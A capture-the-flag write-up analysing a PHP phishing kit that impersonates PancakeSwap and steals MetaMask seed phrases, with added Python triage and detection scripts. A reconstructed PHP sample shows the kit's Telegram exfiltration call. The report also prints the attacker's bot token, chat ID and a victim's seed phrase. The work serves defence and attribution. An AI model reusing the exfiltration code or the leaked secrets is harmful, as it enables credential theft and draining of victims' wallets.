Incident Investigation Report: GrabThePhisher — Dismantling a DeFi Phishing Kit
Platform: CyberDefenders
Challenge: GrabThePhisher
Category: Threat Intelligence
Difficulty: Easy
Tools: Static Code Analysis, CyberChef
Achievement: Proof of Completion
1. Executive Summary
Incident Type: Credential Harvesting / Phishing
Target: Decentralized Finance (DeFi) — MetaMask / PancakeSwap Users
A decentralized finance (DeFi) platform reported unauthorized fund withdrawals from multiple user wallets. Investigation of the suspected server uncovered a phishing kit — a fully functional PHP backend — impersonating the PancakeSwap exchange. The kit was designed to trick victims into entering their 12-word MetaMask seed phrases, which were simultaneously saved locally on the server and exfiltrated in real-time via the Telegram Bot API. Three wallets had already been compromised before the kit was discovered.
Indicators of Compromise (IOCs)
| Type | Indicator | Description |
|---|---|---|
| Exfiltration Domain | api.telegram.org | Telegram Bot API used for real-time exfiltration |
| Telegram Bot Token | 5457463144:AAG8t4k7e2ew3tTiOIBShcWbSia0Irvxm10 | Attacker’s bot credential |
| Telegram Chat ID | 5442785564 | Attacker’s receiving channel |
| Threat Actor Alias | j1j1b1s@m3r0 | Developer alias found in source code comments |
| Geolocation API | http://api.sypexgeo.net/json/ | Used to profile victim locations |
| Victim Log File | ./log/log.txt | Local credential storage on compromised server |
| Compromised Seed Phrase | father also recycle embody balance concert mechanic believe owner pair muffin hockey | Most recent captured 12-word phrase |
MITRE ATT&CK Mapping Overview
| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Phishing — Spearphishing Link | T1566.002 |
| Execution | Server-Side Scripting (PHP) | T1059.007 |
| Discovery | System Location Discovery via Geo API | T1614 |
| Collection | Adversary-in-the-Middle — Credential Harvesting | T1557 |
| Exfiltration | Exfiltration Over Web Service (Telegram) | T1567 |
2. Phase 1: Triage & Target Identification (Questions 1 & 2)
Objective: Identify the phishing kit’s primary target and the backend file responsible for processing stolen credentials.
After extracting the phishing kit archive (pankewk), the initial review covered the directory structure. Multiple frontend assets themed around PancakeSwap were present, but one subdirectory stood out immediately:
A dedicated folder named metamask contained a complete PHP processing backend. This naming convention is deliberate — phishing kit developers structure their kits by target wallet, making it trivial to identify the intended victim profile.
Answer Q1
What cryptocurrency wallet is the phishing kit targeting?
MetaMask
Answer Q2
What is the file that is responsible for managing the phishing kit?
metamask.php
3. Phase 2: Backend Code Analysis (Questions 3 & 4)
Objective: Analyze the backend script to understand the processing language and how the kit profiles its victims.
Opening metamask.php revealed a PHP script with two key behaviors: it captures the submitted seed phrase from a form POST, and before exfiltrating it, it makes an external API call to enrich the stolen data with geographic context.
The script calls http://api.sypexgeo.net/json/ — a third-party geolocation API — using the victim’s IP ($_SERVER['REMOTE_ADDR']). This returns the victim’s country and city, which is appended to the stolen credential record before exfiltration. This profiling step helps the attacker filter out bot traffic and security researchers from their victim logs.
Analyst Note: Geolocation profiling by phishing kits is a growing trend. By filtering out IPs from known security vendor ranges or countries of no interest to the attacker, the kit can maximize the relevance of captured credentials and reduce noise in the exfiltration channel.
Answer Q3
What programming language is used to develop the kit?
PHP
Answer Q4
What service does the kit use to extract the user’s IP address details?
Sypex Geo
4. Phase 3: Victim Data Recovery (Questions 5 & 6)
Objective: Determine how many victims have been compromised and recover the most recently stolen seed phrase.
The code analysis revealed a secondary logging mechanism:
```php
// Append each captured submission ($text) to <document root>/log/log.txt;
// the leading @ suppresses any PHP warning if the write fails.
@file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);
```
This writes each captured credential set to a local text file on the compromised server. Navigating to ./log/log.txt exposed three entries — three real victims whose 12-word seed phrases were irrecoverably compromised.
Analyst Note: A 12-word seed phrase is the master key to a cryptocurrency wallet. There is no “password reset” or recovery mechanism — possession of the seed phrase means full, permanent ownership of all associated funds. Victims must be notified immediately and must transfer any remaining funds to a new wallet generated on a clean device.
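The recovery step above (counting entries in log.txt and pulling the most recent phrase) is easy to do by hand for three victims, but a kit that has been live for weeks can leave hundreds of appended blocks, some of them incomplete submissions. The following parser is an added example written for this report, not code from the kit or the challenge. The layout of SAMPLE_LOG_TXT (a `=== new ===` separator followed by `Field: value` lines) is a constructed assumption, since the real kit's `$text` format is not reproduced on this page; the phrases are placeholder tokens, not seed words. It goes slightly beyond the page by discarding blocks whose phrase is not 12 words and by producing a redacted form of a phrase for use in victim-notification records.

```python
import re

# Constructed log.txt content in an assumed layout: one block per submission,
# appended oldest-first as FILE_APPEND would produce. The second block is an
# incomplete 11-word submission, which a kit's backend would still append.
# Phrase words are placeholders (w01, x01, ...), not real seed words.
SAMPLE_LOG_TXT = """\
=== new ===
Seed: w01 w02 w03 w04 w05 w06 w07 w08 w09 w10 w11 w12
IP: 203.0.113.5
Location: Country A, City A
=== new ===
Seed: x01 x02 x03 x04 x05 x06 x07 x08 x09 x10 x11
IP: 203.0.113.6
Location: Country B, City B
=== new ===
Seed: y01 y02 y03 y04 y05 y06 y07 y08 y09 y10 y11 y12
IP: 203.0.113.7
Location: Country C, City C
=== new ===
Seed: z01 z02 z03 z04 z05 z06 z07 z08 z09 z10 z11 z12
IP: 203.0.113.8
Location: Country D, City D
"""

ENTRY_SEPARATOR = "=== new ==="          # assumed block delimiter in the constructed log
FIELD = re.compile(r"^(\w+):\s*(.*)$")   # "Key: value" lines inside a block


def parse_entries(text):
    """Split the appended log into one dict per submission, in file order."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == ENTRY_SEPARATOR:
            current = {}
            entries.append(current)
            continue
        m = FIELD.match(line)
        if m and current is not None:
            current[m.group(1).lower()] = m.group(2)
    return entries


def complete_entries(entries):
    """Keep only submissions whose phrase has the 12 words a MetaMask seed phrase carries."""
    return [e for e in entries if len(e.get("seed", "").split()) == 12]


def latest_seed(entries):
    """Most recent capture = last complete block, because FILE_APPEND writes oldest first."""
    complete = complete_entries(entries)
    return complete[-1]["seed"] if complete else None


def redact_seed(seed):
    """Mask a phrase for reporting: keep the first and last word, blank the rest."""
    words = seed.split()
    if len(words) < 3:
        return "****"
    return " ".join([words[0]] + ["****"] * (len(words) - 2) + [words[-1]])


if __name__ == "__main__":
    entries = parse_entries(SAMPLE_LOG_TXT)
    print(f"blocks in log: {len(entries)}, complete 12-word captures: {len(complete_entries(entries))}")
    print("latest capture (redacted):", redact_seed(latest_seed(entries)))
```

The count of complete captures, not the count of blocks, is the number to report as compromised wallets; the incomplete block is still worth keeping as evidence of an attempted submission.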
Answer Q5
How many cryptocurrency wallets have been compromised so far?
3
Answer Q6
What is the crypto wallet address of the Phisher? (The most recent captured seed phrase)
father also recycle embody balance concert mechanic believe owner pair muffin hockey
5. Phase 4: Exfiltration Channel & Threat Actor Attribution (Questions 7–10)
Objective: Identify the primary exfiltration mechanism and extract threat actor credentials for attribution.
The script’s sendTel() function is where the real intelligence lies:
Every seed phrase submitted by a victim triggers a Telegram API call, delivering the stolen data directly to the attacker’s private Telegram channel in real-time. The function contains two hardcoded secrets: the Bot Token and the Chat ID. Additionally, source code comments left by the developer contain their alias — a classic operational security failure.
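The artefacts pulled out of metamask.php across Phase 2 and Phase 4 (the geolocation API host, the local log path, the hardcoded Bot Token and Chat ID, and the alias in a developer comment) are exactly the things worth extracting automatically from every kit that lands on an analyst's desk. The script below is an added example for this report, not the kit's code or anything from the challenge. SAMPLE_PHP is a constructed stand-in that mimics only the behaviours the report describes; the token and chat ID in it are placeholder-shaped values, and the handle EXAMPLE_ALIAS@example is invented. The regular expressions are heuristics tuned to this kind of kit.

```python
import re
from urllib.parse import urlparse

# Placeholder-shaped secrets for the constructed sample (not the kit's real values).
# A Telegram bot token has the shape "<8-10 digits>:<35 token chars>"; a chat ID is an integer.
PLACEHOLDER_TOKEN = "0000000000:" + "A" * 35
PLACEHOLDER_CHAT_ID = "1111111111"

# Constructed PHP source modelled on the behaviours described in the report
# (form POST capture, Sypex Geo lookup, local log append, Telegram sendMessage).
# Hypothetical text written for this example, not the kit's actual code.
SAMPLE_PHP = r'''<?php
// kit by EXAMPLE_ALIAS@example - do not resell
$seed = $_POST['seed'];
$geo  = @file_get_contents('http://api.sypexgeo.net/json/'.$_SERVER['REMOTE_ADDR']);
$text = "Seed: $seed\nIP: ".$_SERVER['REMOTE_ADDR']."\nGeo: $geo\n";
@file_put_contents($_SERVER['DOCUMENT_ROOT'].'/log/'.'log.txt', $text, FILE_APPEND);
function sendTel($text) {
    $token = "__TOKEN__";
    $chat_id = "__CHAT_ID__";
    @file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=".urlencode($text));
}
sendTel($text);
'''.replace("__TOKEN__", PLACEHOLDER_TOKEN).replace("__CHAT_ID__", PLACEHOLDER_CHAT_ID)

# Heuristic patterns for the artefacts this kind of kit leaves behind.
TELEGRAM_TOKEN = re.compile(r"(?<![A-Za-z0-9_-])\d{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])")
CHAT_ID_ASSIGN = re.compile(r"chat_id\s*=\s*['\"]?(-?\d{6,})")
URL = re.compile(r"https?://[^\s'\"]+")
# PHP comments: '//' not preceded by ':' (so URLs are not mistaken for comments), '#', /* ... */
COMMENT = re.compile(r"(?<!:)//[^\n]*|#[^\n]*|/\*.*?\*/", re.S)
HANDLE = re.compile(r"[A-Za-z0-9_.]+@[A-Za-z0-9_.]+")   # alias-like tokens inside comments


def log_targets(src):
    """Reconstruct the literal path fragments passed as the file_put_contents() target."""
    targets = []
    for arg in re.findall(r"file_put_contents\(\s*([^,]+),", src):
        arg = re.sub(r"\$_SERVER\[[^\]]*\]", "", arg)   # drop $_SERVER['DOCUMENT_ROOT'] etc.
        literal = "".join(re.findall(r"['\"]([^'\"]*)['\"]", arg))
        if literal:
            targets.append(literal)
    return targets


def triage_php_source(src):
    """Pull the attribution and IOC artefacts out of a kit's PHP source."""
    hosts = {urlparse(u).hostname for u in URL.findall(src)}
    comments = " ".join(COMMENT.findall(src))
    return {
        "telegram_tokens": sorted(set(TELEGRAM_TOKEN.findall(src))),
        "telegram_chat_ids": sorted(set(CHAT_ID_ASSIGN.findall(src))),
        "external_hosts": sorted(h for h in hosts if h),
        "log_files": log_targets(src),
        "comment_handles": sorted(set(HANDLE.findall(comments))),
    }


if __name__ == "__main__":
    for key, value in triage_php_source(SAMPLE_PHP).items():
        print(f"{key:18} {value}")
```

Run it over every .php file in the recovered archive and diff the results across kits: a recurring bot token or comment handle links separate deployments to the same operator, which is the attribution value the report draws from sendTel().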
Analyst Note: The Telegram Bot API is increasingly abused as a C2 and exfiltration channel because the traffic appears legitimate (HTTPS to api.telegram.org), is encrypted end-to-end, and is rarely blocked by corporate firewalls. Defenders should monitor web server outbound connections to api.telegram.org — legitimate web servers have no business reason to call this endpoint.
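The monitoring recommendation above can be turned into a concrete rule over egress telemetry. The detection below is an added example written for this report, not part of the challenge or any product. It assumes a JSON-lines egress log carrying the source host, the destination name (from DNS or TLS SNI) and the port; that format, the asset inventory, the allowlist and the host addresses are all constructed. It goes one step beyond the page by also raising a lower-severity alert for any destination outside the web tier's expected egress set, which is how the kit's call to api.sypexgeo.net would surface.

```python
import json
from collections import Counter

# Constructed asset inventory: role of each internal host (hypothetical addresses).
ASSET_ROLES = {"10.0.1.10": "web", "10.0.1.11": "web", "10.0.5.20": "workstation"}

# Messaging bot APIs a production web server has no business reason to contact.
DROP_SERVICES = {"api.telegram.org"}

# Destinations the web tier is expected to reach (constructed allowlist).
WEB_EGRESS_ALLOWLIST = {"cdn.example.net"}

# Constructed egress log, one JSON object per line, as an egress proxy or a
# DNS/SNI-aware flow sensor might emit it. The third line is deliberately malformed.
SAMPLE_EGRESS_LOG = """\
{"ts": "2026-04-08T10:01:02Z", "src": "10.0.1.10", "dst_name": "cdn.example.net", "dst_port": 443}
{"ts": "2026-04-08T10:01:09Z", "src": "10.0.1.10", "dst_name": "api.telegram.org", "dst_port": 443}
this line is not JSON
{"ts": "2026-04-08T10:02:30Z", "src": "10.0.5.20", "dst_name": "api.telegram.org", "dst_port": 443}
{"ts": "2026-04-08T10:03:11Z", "src": "10.0.1.11", "dst_name": "api.sypexgeo.net", "dst_port": 80}
{"ts": "2026-04-08T10:04:45Z", "src": "10.0.1.10", "dst_name": "api.telegram.org", "dst_port": 443}
"""


def classify(event):
    """Return (severity, reason) for one egress event, or None when it is expected."""
    if ASSET_ROLES.get(event["src"]) != "web":
        return None   # this rule is scoped to the web tier
    dst = event["dst_name"].lower()
    if dst in DROP_SERVICES:
        return ("high", "web server contacting a messaging bot API (exfiltration drop)")
    if dst not in WEB_EGRESS_ALLOWLIST:
        return ("medium", "web server contacting a non-allowlisted third-party host")
    return None


def detect(log_text):
    """Run the rule over a JSON-lines egress log; unparsable lines are counted, not fatal."""
    alerts, skipped = [], 0
    for line in log_text.splitlines():
        try:
            event = json.loads(line)
            verdict = classify(event)
        except (ValueError, KeyError):
            skipped += 1
            continue
        if verdict:
            severity, reason = verdict
            alerts.append({"ts": event["ts"], "src": event["src"], "dst": event["dst_name"],
                           "severity": severity, "reason": reason})
    return alerts, skipped


def summarize(alerts):
    """Count alerts per (source, destination) pair so repeated beaconing stands out."""
    return Counter((a["src"], a["dst"]) for a in alerts)


if __name__ == "__main__":
    found, bad = detect(SAMPLE_EGRESS_LOG)
    for a in found:
        print(f'{a["ts"]} {a["severity"]:6} {a["src"]} -> {a["dst"]}: {a["reason"]}')
    print("repeat contacts:", dict(summarize(found)), "| unparsable lines:", bad)
```

The per-pair summary is what distinguishes a single misconfigured request from a kit that fires on every victim submission: in the sample, the same web host reaches api.telegram.org twice within minutes.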
Answer Q7
What cryptocurrency exchange is the kit impersonating?
PancakeSwap
Answer Q8
What is the phishing kit’s Telegram bot token?
5457463144:AAG8t4k7e2ew3tTiOIBShcWbSia0Irvxm10
Answer Q9
What is the phishing kit’s Telegram chat ID?
5442785564
Answer Q10
What is the identifier of the threat actor that created this kit?
j1j1b1s@m3r0
6. Conclusion
The GrabThePhisher investigation reveals a ready-made, operationally mature phishing kit targeting cryptocurrency users. Key findings:
- Target: MetaMask wallet holders lured via fake PancakeSwap pages.
- Backend: PHP script (metamask.php) handling form submissions with victim geolocation profiling via Sypex Geo.
- Dual Logging: Credentials stored locally in log.txt AND exfiltrated in real-time via the Telegram Bot API.
- Scope: Three wallets compromised before detection.
- Attribution: Developer alias j1j1b1s@m3r0 exposed via code comments — a clear OPSEC failure.
Key Takeaways for the SOC:
- Phishing kits leave fingerprints: Developer aliases in source comments, hardcoded API keys, and local log files are intelligence goldmines that must be recovered during investigation.
- Telegram is the new exfiltration drop: Monitor for anomalous outbound connections from web servers to api.telegram.org. This is never legitimate on a production web server.
- File extension ≠ File type: .jpg.php and .pdf.exe tricks remain effective. Always validate MIME types, not filenames.
- Crypto theft is permanent: Unlike bank transfers, cryptocurrency transactions cannot be reversed. Incident response timelines must be treated as critical to minimize further loss.
Analysis Date: April 8, 2026
Analyst: El OMARI Zakaria